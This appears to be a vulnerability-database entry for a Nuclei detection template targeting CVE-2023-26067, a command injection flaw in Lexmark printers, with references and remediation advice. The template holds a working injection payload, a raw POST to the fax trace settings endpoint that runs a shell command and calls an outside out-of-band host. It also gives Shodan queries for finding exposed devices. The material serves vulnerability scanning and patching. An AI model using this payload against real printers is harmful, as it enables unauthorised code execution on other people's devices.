Lucene search
K

Lexmark Printers - Command Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 101 Views

Lexmark Printers - Command Injection vulnerability through 2023-02-19. Mitigate with latest firmware update from Lexmark

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Lexmark Device Embedded Web Server Remote Code Execution Exploit
19 Sep 202300:00
zdt
GithubExploit
Exploit for Improper Input Validation in Lexmark Cxtpc_Firmware
7 Aug 202320:55
githubexploit
Circl
CVE-2023-26067
11 Apr 202300:22
circl
CNNVD
Lexmark 输入验证错误漏洞
10 Apr 202300:00
cnnvd
CVE
CVE-2023-26067
10 Apr 202300:00
cve
Cvelist
CVE-2023-26067
10 Apr 202300:00
cvelist
Metasploit
Lexmark Device Embedded Web Server RCE
19 Sep 202319:50
metasploit
NCSC
Vulnerabilities fixed in Lexmark Printers and Multifunctionals
13 Mar 202300:00
ncsc
NVD
CVE-2023-26067
10 Apr 202320:15
nvd
OpenVAS
Lexmark Printer Multiple Input Validation Vulnerabilities (Mar 2023)
16 Mar 202300:00
openvas
Rows per page
id: CVE-2023-26067

info:
  name: Lexmark Printers - Command Injection
  author: DhiyaneshDK
  severity: high
  description: |
    Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the affected device.
  remediation: |
    Apply the latest firmware update provided by Lexmark to mitigate the command injection vulnerability.
  reference:
    - https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/
    - https://github.com/horizon3ai/CVE-2023-26067
    - https://nvd.nist.gov/vuln/detail/CVE-2023-26067
    - https://publications.lexmark.com/publications/security-alerts/CVE-2023-26067.pdf
    - https://support.lexmark.com/alerts/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2023-26067
    cwe-id: CWE-20
    epss-score: 0.37835
    epss-percentile: 0.98362
    cpe: cpe:2.3:o:lexmark:cxtpc_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lexmark
    product: cxtpc_firmware
    shodan-query:
      - "Server: Lexmark_Web_Server"
      - "server: lexmark_web_server"
  tags: cve2023,cve,printer,iot,lexmark,vkev,vuln
variables:
  cmd: 'nslookup {{interactsh-url}}'

http:
  - raw:
      - |
        POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Length: 49

        FT_Custom_lbtrace=$({{cmd}})

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains(body, 'Fax Trace Settings')
          - status_code == 200
        condition: and
# digest: 4b0a0048304602210093af5802e0f77d64defb8e06b874fe74250a9681afbcc9c36c463a14e51a9df50221008cd57b716896cba4f2b6c1e9b1f14620d644f61e28aac71b41c930195e827d6c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.18.1
EPSS0.37835
SSVC
101